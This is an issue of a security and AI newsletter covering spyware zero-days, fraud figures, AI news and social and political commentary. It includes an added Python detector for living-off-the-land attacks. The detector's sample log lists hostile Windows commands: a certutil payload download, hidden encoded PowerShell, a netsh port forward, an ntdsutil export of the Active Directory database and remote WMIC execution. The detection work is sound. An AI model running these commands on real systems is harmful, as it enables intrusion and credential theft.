UL NO. 419: Problem Quality, 0-Day Spyware, LOTL, Ollama + OpenAI
2024-2-13 01:49:30 Author: danielmiessler.com

Unsupervised Learning is a security, AI, and meaning-focused newsletter that looks at how best to thrive as humans in a world that’s changing faster than ever. It combines original ideas and analysis to bring you not just what’s happening—but why it matters, and how to respond.


Hey there,

A few quick things…

  • I’m seriously messing up on the gym/weights/walking/table tennis side. Have only exercised a few times in the last few weeks! And I can feel it.

  • The reason for this is that my energy and mood have been so high from my work, and I’ve basically been going non-stop. No excuse. I tell you all about this so you can shame me.

  • Tons of inbound interest of all kinds due to Fabric taking off. A million ideas for how to improve it already! Many thanks to @xssdoctor for being such a huge part of the project. You know…between his patients as a f’ing cardiologist!

Let’s get into it…

MY WORK

SECURITY

Google’s Threat Analysis Group (TAG) says 80% of the in-the-wild zero-days it discovered last year came from commercial spyware vendors. Google has been tracking around 40 of these companies and specifically calls out some of them, including: Cy4Gate, RCS Lab, Intellexa, Negg Group, NSO Group, and Variston. MORE

💡I’m noticing an interesting pattern here. The biggest threat to your data might not be the dark web, but data brokers, which are actual companies. And the biggest threat from weaponized 0-days might not be the random attacker, but commercial spyware companies. Which, again, often sell legally. So it’s not the criminal activity that’s most scary, it’s the criminal activity that’s weaponized into a “legitimate” business. What’s another example? Lobbying?

Related to that, the US is going after commercial spyware by restricting visas for people known to be associated with the industry. MORE

Americans lost a record $10 billion to fraud in 2023, according to the FTC's latest report, up 14% from 2022. Investment scams were the main type, and they were up 21% YOY. MORE

Sponsor

GO BEYOND PENTEST MANAGEMENT AND REPORTING WITH PLEXTRAC

What if you could cut the time spent on pentest reporting workflows in half? With PlexTrac, you can

  • Analyze your attack surface at the asset level.

  • Action all pentest and vulnerability scanner data in one place.

  • Use context-based scoring to prioritize risk.

  • Conquer the last mile of continuous validation. 

What does this mean for you? 

Check out PlexTrac.com/UnsupervisedLearning for a personalized demo to see how PlexTrac can help you boost efficiency and recognize real value, today. 

Cory Doctorow got scammed by someone claiming to be from his bank, and he wrote a full blog post about it. Hats off for the vulnerability, but the guy called on a crappy VOIP line, mispronounced the credit union’s name, and asked for his full credit card number? And he gave it to him? In his defense, he says he knows his credit union uses people with bad mics who don’t know how to pronounce the name of the credit union. Jesus, man, get a new bank. Still, I do appreciate the transparency. MORE

The FCC has officially declared AI-generated voice robocalls illegal. I’m curious how much effect this will have given that most scammers are already breaking the law on purpose in multiple ways. But I like how quickly action was taken. MORE

Canada is moving to ban the Flipper Zero to address a spike in car thefts. The creators of Flipper Zero argue that their device cannot be used to steal cars made after the 1990s due to advanced security systems. Pretty happy I don’t live in Canada (or Florida) where the government just randomly bans stuff. MORE

OnlyFake is putting out really good fake IDs with AI. The site claims to produce up to 20,000 documents daily using "neural networks" and "generators". Seems like they’re probably going to get smashed by authorities, but here come the copycats. MORE

The FBI and CISA have put out a joint guide to "Living Off The Land" (LOTL) attacks, where attackers use legitimate tools for malicious purposes. MORE | GUIDE PDF
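The practical problem the guide is pointing at is that LOTL activity uses binaries that are already on every host and already in every allowlist, so "this process is certutil" is not a signal by itself. The check that does work is the combination of a legitimate binary with an argument pattern that has no normal business use. The following is an added example of that detection logic, not code from the FBI/CISA guide: the log format, hosts, users and command lines are constructed for the illustration, and the rule set is a small hand-picked sample of commonly abused Windows tools, not the guide's own list.

```python
"""
Living-off-the-land detection over process-creation records.

Added illustration (not from the FBI/CISA guide): every binary below is a
legitimate Windows tool, so the rules key on argument patterns rather than
on the binary name alone. Log format and records are constructed.
"""
import re
from typing import Dict, List

# Constructed records in a simple key=value layout. In practice you would
# feed Sysmon Event ID 1 or Windows Security 4688 records with command-line
# auditing enabled, which is the telemetry LOTL detection depends on.
SAMPLE_LOG = r"""
2024-02-12T10:01:02Z ws01 user=alice image=C:\Windows\System32\certutil.exe cmd="certutil -urlcache -split -f http://10.0.0.5/a.txt C:\Users\Public\a.txt"
2024-02-12T10:03:15Z ws01 user=alice image=C:\Windows\System32\certutil.exe cmd="certutil -verify C:\Users\alice\cert.pem"
2024-02-12T10:05:40Z ws02 user=bob image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd="powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"
2024-02-12T10:06:01Z ws02 user=bob image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd="powershell Get-Service -Name Spooler"
2024-02-12T10:09:22Z srv01 user=svc_backup image=C:\Windows\System32\netsh.exe cmd="netsh interface portproxy add v4tov4 listenport=9999 connectaddress=10.0.0.9 connectport=8443"
2024-02-12T10:11:05Z dc01 user=admin image=C:\Windows\System32\ntdsutil.exe cmd="ntdsutil ac i ntds ifm create full C:\Temp\x q q"
2024-02-12T10:12:30Z ws03 user=carol image=C:\Windows\System32\wbem\WMIC.exe cmd="wmic /node:srv02 process call create cmd.exe"
""".strip()

LINE_RE = re.compile(
    r'^(?P<ts>\S+)\s+(?P<host>\S+)\s+user=(?P<user>\S+)\s+'
    r'image=(?P<image>\S+)\s+cmd="(?P<cmd>.*)"$'
)

# (binary, argument pattern, reason). A rule fires only when both match,
# so plain "certutil -verify" or "powershell Get-Service" stay quiet.
LOTL_RULES = (
    ("certutil", re.compile(r"-urlcache|-decode|-encode", re.I),
     "certutil used to download or decode a payload"),
    ("powershell", re.compile(r"-(e|ec|enc|encodedcommand)\b|downloadstring|\biex\b", re.I),
     "encoded or download-cradle PowerShell"),
    ("wmic", re.compile(r"/node:|process\s+call\s+create", re.I),
     "WMIC remote or process execution"),
    ("netsh", re.compile(r"\bportproxy\b", re.I),
     "netsh portproxy port forwarding"),
    ("ntdsutil", re.compile(r"\bifm\b|\bac\s+i\s+ntds\b", re.I),
     "ntdsutil export of the AD database"),
)


def binary_name(image: str) -> str:
    """Normalise an image path to a lowercase basename without .exe."""
    name = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def detect_lotl(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per record whose binary and arguments match a rule."""
    findings: List[Dict[str, str]] = []
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # malformed record: skip rather than guess at fields
        rec = m.groupdict()
        binary = binary_name(rec["image"])
        for name, pattern, reason in LOTL_RULES:
            if binary == name and pattern.search(rec["cmd"]):
                findings.append({
                    "ts": rec["ts"], "host": rec["host"], "user": rec["user"],
                    "binary": binary, "reason": reason, "cmd": rec["cmd"],
                })
                break
    return findings


if __name__ == "__main__":
    for f in detect_lotl(SAMPLE_LOG):
        print(f"{f['ts']} {f['host']} {f['user']}: {f['reason']} :: {f['cmd']}")
```

Run as-is it flags five of the seven constructed records and leaves the two benign uses of the same binaries alone. The caveat a practitioner will already know: without command-line auditing turned on, the `cmd` field is empty and this whole class of detection degrades to "certutil ran", which is useless.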

CISA revealed that the Volt Typhoon hacking group, backed by China, has been lurking undetected in some US critical infrastructure IT environments for over five years, potentially sleeping for future attacks. MORE

A crowd in San Francisco attacked and set on fire a Waymo car. If you haven’t seen the animated Matrix series, go watch it. It’s about to be super relevant. MORE

A Chinese group infiltrated the Dutch military's network with a previously unknown malware strain, Coathanger, designed to persist through reboots and firmware upgrades. The impact was limited thanks to the network's segmentation, affecting fewer than 50 users involved in unclassified R&D projects. MORE

Incidents

Verizon accidentally exposed over 63,000 employees' personal data. MORE

💡Someone asked me on a podcast recently why so many telcos have security issues. I didn’t have a better answer than lots of users and lots of employees. In other words, lots of attack surface? If someone has a better analysis, let me know.

Vulnerabilities

🪳FORTINET VULNERABILITIES — Fortinet's FortiSIEM faces two critical vulnerabilities enabling remote code execution. | CRITICAL | 10.0 | MORE

🪳Critical patches were also released for new flaws in Cisco and VMware products, rated up to 9.6 on the Richter scale. MORE

TECHNOLOGY

A study (and paper) put human lawyers up against LLMs for evaluating legal documents. It went about like you’d expect. For determining legal issues, LLMs (specifically GPT-4-1106) matched or slightly exceeded the accuracy of junior lawyers and were very close to the accuracy of LPOs (legal process outsourcers). For locating legal issues, LLMs were slightly less accurate than LPOs but still outperformed junior lawyers. Worse for the humans, though, was the speed difference: the LLMs did that work between 91.63% and 99.64% faster than the human reviewers. MORE

💡This seems like a good time to mention a piece of advice I have for previously high-status jobs that are vulnerable to AI, e.g., lawyers, doctors, engineers. Build a brand and learn how to do your thing in public. If you can’t figure out how to broadcast your expertise as a unique message, and connect with people, you’re likely to get crushed by AI. Many of these professions have one thing in common: they are based on collecting knowledge and experience into an education, and imperfectly giving that experience to a human. That is the worst possible place to be as a human, because AI has, or will soon have, the life and work experience of millions of doctors/lawyers/engineers. Get to the human side ASAP.

🔥 Ollama now supports OpenAI’s API format, meaning you can just substitute your OpenAI calls for Ollama calls (which are local), and get local results. Super cool! MORE
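What "substitute your OpenAI calls" looks like in practice is a change of two values, the base URL and the API key, with the request and response shapes untouched. Here is an added example of that swap (my code, not Ollama's). It assumes Ollama's OpenAI-compatible endpoint at its default address, http://localhost:11434/v1, and a locally pulled model name ("llama2" is an assumption; use whatever `ollama list` shows). The security point worth keeping in mind: Ollama's API has no authentication of its own, the key is a placeholder it ignores, so leave it bound to localhost, and if you change OLLAMA_HOST to expose it on a network interface, put something that does authenticate in front of it.

```python
"""
Point an OpenAI-style chat call at a local Ollama server instead.

Added example, not code from the Ollama project. Assumes the OpenAI-compatible
endpoint at http://localhost:11434/v1 and a pulled model ("llama2", an
assumption). Only the standard library is used so the request shape is visible.
"""
import json
import urllib.request
from typing import Any, Dict, List, Tuple

OPENAI_BASE_URL = "https://api.openai.com/v1"
OLLAMA_BASE_URL = "http://localhost:11434/v1"  # Ollama's default listen address


def build_chat_request(messages: List[Dict[str, str]], model: str,
                       base_url: str = OLLAMA_BASE_URL, api_key: str = "ollama"
                       ) -> Tuple[str, Dict[str, str], Dict[str, Any]]:
    """Return (url, headers, payload) for POST /chat/completions.

    Swapping backends changes nothing but base_url and the key: Ollama has no
    authentication and ignores the key's value, but OpenAI-style clients insist
    one is present, so a placeholder is sent.
    """
    url = f"{base_url.rstrip('/')}/chat/completions"
    headers = {"Content-Type": "application/json",
               "Authorization": f"Bearer {api_key}"}
    payload = {"model": model, "messages": messages, "temperature": 0}
    return url, headers, payload


def parse_chat_completion(response: Dict[str, Any]) -> str:
    """Pull the assistant text out of an OpenAI-format response (same shape for both backends)."""
    choices = response.get("choices") or []
    if not choices:
        raise ValueError(f"no choices in response: {response.get('error', response)}")
    return choices[0]["message"]["content"]


def chat(messages: List[Dict[str, str]], model: str = "llama2",
         base_url: str = OLLAMA_BASE_URL, api_key: str = "ollama",
         timeout: float = 120) -> str:
    """Send the request and return the assistant's reply (needs a running server)."""
    url, headers, payload = build_chat_request(messages, model, base_url, api_key)
    req = urllib.request.Request(url, data=json.dumps(payload).encode(),
                                 headers=headers, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return parse_chat_completion(json.load(resp))


# Constructed response in OpenAI's format so the parser can be exercised
# without a server; the id and text are made up.
SAMPLE_RESPONSE: Dict[str, Any] = {
    "id": "chatcmpl-example",
    "object": "chat.completion",
    "model": "llama2",
    "choices": [{"index": 0, "finish_reason": "stop",
                 "message": {"role": "assistant", "content": "Hello there."}}],
}

if __name__ == "__main__":
    # The same call against OpenAI would be:
    #   chat(msgs, model="gpt-4", base_url=OPENAI_BASE_URL, api_key=YOUR_OPENAI_KEY)
    msgs = [{"role": "system", "content": "Answer in one sentence."},
            {"role": "user", "content": "What is a living-off-the-land attack?"}]
    print(chat(msgs))
```

Because the payload and response formats are identical, the same `parse_chat_completion` serves both backends; only `chat()` needs a live server, and it will fail loudly with a `ValueError` carrying the server's error object if the model name is not pulled.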

Sam Altman bets on AI creating one-person billion-dollar companies soon. In a chat with tech CEO friends, Altman predicts AI advancements will enable a single person to run a billion-dollar company by automating jobs across various sectors. Yep, this is what we’ve been saying here. MORE

Sam Altman is looking to raise up to $7 trillion (that’s a “t”) for AI chip production. The plan involves a partnership between OpenAI, investors, chip makers, and power providers to build new chip foundries, with OpenAI committing to be a major customer. MORE

💡I’m starting to think that you need basically crazy people to make real progress. Jobs. Musk. Altman. The winning combination seems to be an insane vision, and then not listening to anyone who tells you it’s impossible.

HUMANS

Mexico has overtaken China as the top exporter to the US. Factors contributing to this shift include Trump-era tariffs and Biden's climate policies making Chinese imports costlier, plus strategic moves by manufacturers to relocate closer to the US market due to political tensions and rising labor costs in China. MORE

Researchers have used information theory to analyze why Bach's music feels so compelling. They analyzed his compositions by converting them into information networks and found some patterns that may explain why he was so good. MORE

💡I’m currently obsessed with Claude Shannon’s Information Theory and how it applies to real life, so this is interesting. Here’s how I think it applies to writing and giving presentations. MORE

The wealthy are cutting lines all over the place, like at the airport, Disney World and ski resorts. From Tinder's $499 membership to ski lift fast-track passes, people are paying premiums to bypass queues. MORE 

💡People with money seem to be increasingly living in a completely different world than those without it. Meaning, someone who makes $50,000 a year, which used to be decent money, is now vastly less capable of doing things than someone who makes $150K or above (an arbitrary, anecdotal cutoff). That’s 3X as much, so that may seem obvious, but it didn’t used to be that way. Or at least it didn’t seem so to me. In the ’80s and ’90s we were all doing the same stuff, in the same places. Now, if you go to nicer cafes or restaurants, they don’t really have many people there doing regular jobs. Meals at nice places (at least in the Bay Area) are usually over $120, and that’s just for 2 people. Rent is insane. Mortgage, forget about it. Food bills. Gas? I honestly don’t know what anyone is going to do on $50,000 in big cities on the coasts. And this separation of restaurants, hobbies, neighborhoods, and other parts of our lives cannot be healthy.

Gallup just showed that only 47% of Americans report being "very satisfied" with their lives, a figure that's just barely above the record low set in 2011. Those earning over $100,000, married individuals, religious attendees, college graduates, Democrats, and those aged 55 and older are more likely to report high levels of satisfaction. See the callout above. MORE | GALLUP STUDY

The Three-Body Problem's audiobook is getting a new voice with Rosalind Chao, just ahead of Netflix's adaptation. Actress Rosalind Chao, known for her role in the Netflix series, is narrating the new audiobook version of The Three-Body Problem, offering a unique take on the entire story. The new audiobook comes out February 27th. I’m going to re-read (listen to) this version. MORE

Over the past three years, Democrats’ lead with Black Americans has decreased by nearly 20 points, and similar declines are seen among Hispanic adults and young adults aged 18 to 29. Democrats still maintain a significant lead among non-Hispanic Black adults, with a 47-percentage-point advantage, but this is the smallest margin Gallup has recorded since it began its polling. MORE

Seine-Port, a quaint village near Paris, recently voted to limit smartphone use in public spaces, aiming to encourage more human interaction and less screen time. MORE

A startling 46% of Americans didn't finish a single book last year, placing anyone who read at least two books in the top half of American readers. I surmise that these numbers are wildly too high, due to the book version of preference falsification. But maybe if we’re counting comic books, true crime, romance, and that kind of stuff, we get close to 50%. I’d love to see the number for non-true-crime, non-fiction books. I bet that number is closer to 10%? Anyone know any numbers there? MORE

IDEAS & ANALYSIS

How to Elect Donald Trump in 2024 (Politics, Skip if That’s Not Your Thing)

I’ve said this a dozen times already, but I’m going to say it again here on the off chance that there’s anyone that’s reachable.

If Trump gets elected it will be due to catastrophic Democratic mistakes. It won’t be Trump. Trump is easy to beat. It’ll be the left assassinating itself.

All you have to do to beat Trump is not be so extreme in your liberal views. Not sure what I mean? Here, I’ll make a list. 

Here’s how to get Trump elected.

  • Say the US is a horribly unfair and racist country despite the fact that non-white immigrants want to come here more than anywhere, because it’s the most meritocratic place on the planet.

  • Say White Supremacy is worse than it’s ever been.

  • Say Jewish people are the most evil and entitled white people, and that they deserved what happened in Gaza.

  • Say any raising of illegal immigration as an issue makes you a racist.

  • Say that rich people are the source of all our problems.

Say those things and you elect Trump.

Or, to put it another way, all a Democratic candidate would have to do to beat Trump would be to take away those weapons.

Here’s 4 things they could say to beat Trump easily. And they can still be liberals! Like me!

  • Yeah, the Republicans are right about illegal immigration. It’s bad. We’re addressing it. We’re boosting the border patrol by ___ amount, and increasing enforcement on criminals here illegally by ____ amount. But we’re also opening up more legal immigration, because our immigrants are awesome and they make great Americans.

  • No. America is not a horrible country. It’s actually one of the best countries in the world. It’s not the best because we’ve made no mistakes. It’s the best because we try really hard to fix them, and to become the country we’ve always wanted. And we continue to make progress. Don’t believe me? Let’s look at actual numbers. Look at China. Look at Latin America. Look at most countries in Africa. Are they anywhere near as open to minorities as the U.S.? How many religious minorities do they have in political office? How many women? How many LGBTQ people? Racial minorities? How about those same groups running businesses? How do those numbers compare to the U.S.? (then give the numbers that show they have the most diverse political and business leaders anywhere in the world!). We lead the world in lifting people of all groups and cultures to the highest levels in our society. Be proud of that.

  • There’s nothing wrong with being rich or successful. Here in America we look up to that. We always have, and it’s ok to do so. But we also believe that becoming successful has a lot of luck in it. The luck of good parents, or luck of learning the value of grit, discipline, and hard work at an early age, or the luck of being super smart or knowing the right people. That doesn’t take away the extremely hard work it takes to become successful, but it gives the successful a responsibility. Not to give away what they earned, but to invest some of it into those who weren’t so lucky. So THEY can work hard and become successful too.

  • It’s time to be done with cancel culture. It served a good and necessary purpose when we got rid of people like Harvey Weinstein, and we need to continue to stay vigilant against that type of trash across our entire society. But people are flawed, and people can change. And we’ve all known someone who’s a good person who’s done something shameful that they regret. It’s up to us to know the difference between those people and the Harvey Weinsteins of the world. And it’s up to us to stop treating them like they’re the same. Enough.

This is very simple. Say those 4 things and you beat Donald Trump by 10-30%. Continue on with the self-hate and you will find out just how tired the country is with Wokeism.

In other words, Trump could easily win by 5-20% just as a country-wide message to the extreme left that it no longer wants what they’re selling.

NOTES

  • Super excited for the second part of Dune.

  • Can’t wait for the new Three Body Problem series.

  • Got a couple of talks I’m flying to in the next couple of months, and I’m looking forward to using the Apple Vision Pro to work during them!

  • Really need to get back to table tennis and gym and rucking!

DISCOVERY

🖥️ Sudo for Windows — Elevate commands without a new console | by Jordi Adoumie | MORE

🛠 Toolong — Terminal app for log file viewing and management | by Textualize | MORE

🎼 An extraordinary EDM set by my now favorite artist of this genre, CloZee. MORE

🧱 A pretty solid AI stack in February of 2024:

My current OSS go-to stack:

- @supabase for db, auth, storage, realtime
- @LangChainAI for building my rag pipelines
- @posthog for analytics
- @FastAPI for the backend
- @nextjs for the frontend
- @resend for the emails
- @LiteLLM for LLMs compatibility
-  @ollama &… twitter.com/i/web/status/1…

— Stan Girard (@_StanGirard)
Feb 10, 2024

In a GenAI World, Only Identity Matters — A great essay about the problems of identifying who’s doing what in a world full of GenAI. | by Caleb Sima | MORE

Required Security Changes for Secure AI Agents — A solid piece on what will be needed for AI agents to securely operate in real-world scenarios. | by Joseph Thacker | MORE

Jeff Weinstein is excited about Stripe building new zero-to-one products, such as “Support-as-a-service” | by Jeff Weinstein | MORE

OKRs are Bullshit MORE

Simple Precision Time Protocol at Meta MORE

TikTok Is Destroying Itself from the Inside Out MORE

How Levels.fyi scaled to millions of users with Google Sheets as a Backend MORE

Wirecutter content is now freely accessible through Apple News. MORE

Applying Threat Intelligence to the Diamond Model of Intrusion Analysis MORE

OPML is Underrated MORE

The world is awful. The world is much better. The world can be much better. MORE

YouTube now supports uploading podcasting RSS feeds, which means if you used to be an audio podcast person, you can automatically publish your stuff on YouTube when it goes live on the audio version! MORE

Parse, don't validate MORE

RECOMMENDATION OF THE WEEK

Think about the problems you’re working on, and ask yourself if they’re worth years of your attention. There are a lot of layoffs right now, so I’m not recommending you quit your job next week to find beautiful problems.

But I am recommending that you start thinking about it. Especially if the universe is conspiring against us and ends up laying us off, or making it hard to find a job. You might as well make the next one a place where you deeply care about the problems, and the solution.

There are a million benefits of this, but one is also that you’re far more likely to shine at work, and thus be non replaceable, if you’re deeply motivated by the mission.

APHORISM OF THE WEEK

Your work can only be as good as your problems are meaningful.

Thank you for reading.

UL is a personal and strange combination of security, tech, AI, and lots of deeply human content. And because it’s so diverse, it’s harder for it to go as viral as something more niche.

So if you know someone weird like us, please share it with them. 🫶 

Yours,


Source: https://danielmiessler.com/p/ul-419